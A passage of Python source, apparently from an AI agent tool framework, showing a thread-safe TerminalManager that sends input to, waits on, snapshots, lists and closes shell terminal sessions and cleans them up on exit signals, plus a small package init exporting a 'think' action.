                result["message"] = f"Input sent to terminal '{terminal_id}'"
            except (OSError, ValueError, RuntimeError) as e:
                raise RuntimeError(f"Failed to send input to terminal '{terminal_id}': {e}") from e
            else:
                return result

    def wait_terminal(
        self, terminal_id: str | None = None, duration: float = 1.0
    ) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals[terminal_id]
            try:
                result = terminal.wait(duration)
                result["message"] = f"Waited {duration}s on terminal '{terminal_id}'"
            except (OSError, ValueError, RuntimeError) as e:
                raise RuntimeError(f"Failed to wait on terminal '{terminal_id}': {e}") from e
            else:
                return result

    def close_terminal(self, terminal_id: str | None = None) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals.pop(terminal_id)
            try:
                terminal.close()
            except (OSError, ValueError, RuntimeError) as e:
                raise RuntimeError(f"Failed to close terminal '{terminal_id}': {e}") from e
            else:
                return {
                    "terminal_id": terminal_id,
                    "message": f"Terminal '{terminal_id}' closed successfully",
                    "snapshot": "",
                    "is_running": False,
                }

    def get_terminal_snapshot(self, terminal_id: str | None = None) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals[terminal_id]
            return terminal.get_snapshot()

    def list_terminals(self) -> dict[str, Any]:
        with self._lock:
            terminal_info = {}
            for tid, terminal in self.terminals.items():
                terminal_info[tid] = {
                    "is_running": terminal.is_running,
                    "is_alive": terminal.is_alive(),
                    "process_id": terminal.process.pid if terminal.process else None,
                }
            return {"terminals": terminal_info, "total_count": len(terminal_info)}

    def cleanup_dead_terminals(self) -> None:
        with self._lock:
            dead_terminals = []
            for tid, terminal in self.terminals.items():
                if not terminal.is_alive():
                    dead_terminals.append(tid)
            for tid in dead_terminals:
                terminal = self.terminals.pop(tid)
                with contextlib.suppress(Exception):
                    terminal.close()

    def close_all_terminals(self) -> None:
        with self._lock:
            terminals_to_close = list(self.terminals.values())
            self.terminals.clear()
        for terminal in terminals_to_close:
            with contextlib.suppress(Exception):
                terminal.close()

    def _register_cleanup_handlers(self) -> None:
        # Ensure child shells are reaped on interpreter exit and on fatal signals.
        atexit.register(self.close_all_terminals)
        signal.signal(signal.SIGTERM, self._signal_handler)
        signal.signal(signal.SIGINT, self._signal_handler)
        if hasattr(signal, "SIGHUP"):
            signal.signal(signal.SIGHUP, self._signal_handler)

    def _signal_handler(self, _signum: int, _frame: Any) -> None:
        self.close_all_terminals()
        sys.exit(0)


# Module-level singleton shared by all callers.
_terminal_manager = TerminalManager()


def get_terminal_manager() -> TerminalManager:
    return _terminal_manager

View File

@@ -0,0 +1,4 @@
from .thinking_actions import think

__all__ = ["think"]
